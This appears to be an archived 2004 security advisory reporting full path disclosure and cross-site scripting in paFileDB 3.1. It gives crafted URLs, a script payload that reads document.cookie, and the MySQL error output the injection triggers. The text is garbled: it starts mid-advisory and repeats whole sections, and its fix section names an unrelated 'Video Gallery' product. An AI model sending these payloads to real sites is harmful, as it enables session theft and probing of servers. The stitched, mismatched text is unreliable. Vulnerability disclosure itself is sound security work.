paFileDB was unable to successfully run a MySQL query.
MySQL Returned this error: You have an error in your SQL syntax near
'(document.cookie);'' at line 1 Error number: 1064
The query that caused this error was: SELECT * FROM pafiledb_cat WHERE
cat_id = '''
3.- SOLUTION:
¨¨¨¨¨¨¨¨
Vendors were contacted many weeks ago and plan to release a fixed
version soon.
Check the Video Gallery website for updates and official release
details.
4.- Greetings:
---------
greetings to my Peruvian group swp and perunderforce :D
"El pisto es y sera peruano"
5.- Contact
-------
WEB: http://www.darkbicho.tk
EMAIL: darkbicho (at) peru (dot) com [email concealed]
########################################################################
#
###################### :.: DarkBicho :.: ################################
# #
# PROGRAM: paFileDB #
# VERSION: 3.1 #
# URL: http://www.phparena.net #
# BUG: Multiple vulnerabilities #
# DATE: 27/04/2004 #
# AUTHOR: DarkBicho #
# WebSite: http://www.darkbicho.tk #
# Email: darkbicho (at) peru (dot) com [email concealed] #
# Team: Security Wari Projects <www.swp-zone.org> #
# #
########################################################################
#
########################################################################
#
1.- Vulnerabilities:
---------------
A. Full path disclosure:
This vulnerability would allow a remote user to determine the full
path to the web root directory and other potentially sensitive information.
http://site/includes/admin/login.php?formname=DarkBicho&formpass=DarkBic
ho
&B1=%3E%3E+Log+In+%3C%3C&action=admin&login=do
and we get standard error messages, revealing the full path to the nuke
engine scripting files:
Fatal error: Call to undefined function: locbar() in
/home/site/includes/admin/login.php
on line 12
http://localhost/includes/category.php
http://localhost/includes/search.php
http://localhost/includes/main.php
http://localhost/includes/viewall.php
http://localhost/includes/download.php
http://localhost/includes/email.php
http://localhost/includes/file.php
http://localhost/includes/rate.php
http://localhost/includes/stats.php
2. Cross-Site Scripting aka XSS:
----------------------------
Cross-Site Scripting in id variable:
http://localhost/pafiledb.php?action=category&id='<script>alert(document
.cookie);</script>
paFileDB was unable to successfully run a MySQL query.
MySQL Returned this error: You have an error in your SQL syntax near
'(document.cookie);'' at line 1 Error number: 1064
The query that caused this error was: SELECT * FROM pafiledb_cat WHERE
cat_id = '''
3.- SOLUTION:
¨¨¨¨¨¨¨¨
Vendors were contacted many weeks ago and plan to release a fixed
version soon.
Check the Video Gallery website for updates and official release
details.
4.- Greetings:
---------
greetings to my Peruvian group swp and perunderforce :D
"El pisto es y sera peruano"
5.- Contact
-------
WEB: http://www.darkbicho.tk
EMAIL: darkbicho (at) peru (dot) com [email concealed]
---------------------------------- [ EOF ]
------------------------------------
_________________________________________________________________
MSN Amor: busca tu ½ naranja http://latam.msn.com/amor/
[ reply ]